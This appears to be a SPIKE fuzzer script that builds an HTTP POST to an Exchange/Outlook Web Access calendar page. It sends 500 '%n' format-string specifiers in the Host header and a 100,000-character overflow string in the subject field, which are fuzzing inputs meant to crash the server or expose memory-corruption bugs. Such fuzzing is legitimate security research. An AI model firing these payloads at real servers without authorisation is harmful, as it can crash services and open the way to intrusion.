s_string("POST /exchange/dave/Calendar HTTP/1.1\r\n");
s_string("Host: ");
s_string_repeat("%n",500);
s_string("\r\n");
s_string("User-Agent: Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0\r\n");
s_string("Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n");
s_string("Accept-Language: en\r\n");
s_string("Accept-Encoding: gzip, deflate, compress;q=0.9\r\n");
s_string("Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66\r\n");
s_string("Keep-Alive: 300\r\n");
s_string("Connection: keep-alive\r\n");
s_string("Authorization: Basic DAVE\r\n");
s_string_or_env("COOKIE","Cookie: sessionid=780a1c5e-60cf-48d4-9ec5-9a7c7a31ac17,0x9\r\n");
s_string("Referer: http://192.168.1.100/exchange/dave/Calendar/?Cmd=new\r\n");
s_string("Content-type: application/x-www-form-urlencoded\r\n");
s_string("Content-Length: ");
s_blocksize_string("post",7);
s_string("\r\n");
s_string("\r\n");
s_block_start("post");
s_setfirstvariable();
s_string_variables('&',"Importance=1&Required=Dave&Optional=&Resource=&urn%3Aschemas%3Ahttpmail%3Asubject=");
s_string_repeat("A",100000);
s_string_variables('&',"urn%3Aschemas%3Acalendar%3Alocation=This+is+a+location&responserequested=on&urn%3Aschemas%3Acalendar%3Adtstart=2002-06-24T11%3A30%3A00.000Z&urn%3Aschemas%3Acalendar%3Adtend=2002-06-24T12%3A00%3A00.000Z&dtstart_Month=06&dtstart_Day=24&dtstart_Year=2002&dtstart_Time=11%3A30&dtend_Month=06&dtend_Day=24&dtend_Year=2002&dtend_Time=12%3A00&remindercheckbox=on&reminderoffset=900&urn%3Aschemas%3Acalendar%3Abusystatus=BUSY&urn%3Aschemas%3Ahttpmail%3Atextdescription=%0D%0AThis+is+a+comment&Cmd=sendappt&CmdReferring=new&MsgID=&Embedded=0&ReadForm=1&Index=&Action=Cancel&DATACHANGED=1&SENDUPDATE=0&FORMTYPE=appointment&urn%3Aschemas%3Acalendar%3Aalldayevent=&urn%3Aschemas%3Acalendar%3Aresponserequested=1&urn%3Aschemas%3Ahttpmail%3Aimportance=1&urn%3Aschemas%3Acalendar%3Areminderoffset=900");
s_block_end("post");
